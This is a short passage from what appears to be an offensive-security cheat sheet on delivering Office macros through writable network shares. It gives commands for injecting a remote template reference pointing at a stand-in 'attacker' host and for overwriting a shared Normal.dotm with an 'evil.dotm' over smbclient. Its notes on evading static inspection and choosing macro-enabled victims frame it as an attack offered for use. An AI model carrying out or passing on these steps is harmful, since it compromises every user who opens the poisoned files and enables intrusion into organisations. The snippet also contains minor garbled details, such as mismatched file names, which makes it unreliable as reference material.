Shared folders hold the documents a team opens every day, which makes them a delivery channel. An attacker with write access plants a macro-enabled file, injects a remote template reference into an existing document so it fetches a macro at open time, or poisons a shared template (normal.dotm) or add-in that Office loads automatically for everyone who uses it.
# Inject a remote template reference into an existing .docx on the share
# (document.xml.rels Target points at the attacker's macro template)
unzip doc.docx word/_rels/settings.xml.rels # edit Target=http(s)://attacker/t.dotm
# Or replace a shared template that Office autoloads
smbclient //<target>/share -U user%pass -c 'cd Templates; put evil.dotm Normal.dotm'
Exploitation notes#
- Remote-template injection keeps the document looking normal and fetches the payload only at open, which evades static inspection of the file on the share.
- A poisoned shared
normal.dotmor startup add-in runs for every user who opens Office against that path, a broad foothold. - Macro execution depends on the victim's Office macro policy; target teams where macros are enabled for shared templates.